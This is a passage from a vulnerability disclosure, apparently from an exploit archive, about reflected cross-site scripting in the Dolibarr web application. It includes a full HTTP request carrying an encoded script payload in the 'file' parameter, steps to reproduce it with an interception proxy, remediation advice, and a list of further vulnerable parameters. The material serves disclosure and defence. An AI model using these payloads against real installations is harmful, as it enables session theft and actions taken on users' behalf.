attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. HTTP request: GET /dolibarr/viewimage.php?modulepart=userphoto&entity=1&file=2%2F0%2F1234%3cscript%3ealert%2893275%29%3c%2fscript%3e&cache=0 HTTP/1.0 Cookie: DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=t2h9dudaj2qm7vp2skgkhpgs94 Accept: */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: localhost Referer: http://localhost/dolibarr/user/fiche.php?id=2 Affected parameter(s): file Steps to replicate: 41. Open Dolibarr application in browser. 42. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. 43. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request 44. Manipulate file parameter value with payload 2%2F0%2F1234%3cscript%3ealert%2893275%29%3c%2fscript%3e or submit http://localhost/dolibarr/viewimage.php?modulepart=userphoto&entity=1&file=2%2F0%2F1234%3cscript%3ealert%2893275%29%3c%2fscript%3e&cache=0 in address bar and see the output in browser 45. This input was echoed unmodified in the application's response that is the proof of vulnerability Screenshot: Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tools used: Mozilla Firefox browser and Tamper Data Addon Below URLs are also vulnerable with XSS. Parameter URL dol_use_jmobile http://localhost/dolibarr/user/index.php dol_optimize_smallscreen http://localhost/dolibarr/user/index.php dol_no_mouse_hover http://localhost/dolibarr/user/index.php dol_hide_topmenu http://localhost/dolibarr/user/index.php dol_hide_leftmenu http://localhost/dolibarr/user/index.php dol_use_jmobile http://localhost/dolibarr/user/logout.php dol_optimize_smallscreen http://localhost/dolibarr/user/logout.php dol_no_mouse_hover http://localhost/dolibarr/user/logout.php dol_hide_topmenu http://localhost/dolibarr/user/logout.php dol_hide_leftmenu http://localhost/dolibarr/user/logout.php # 0day.today [2024-12-25] #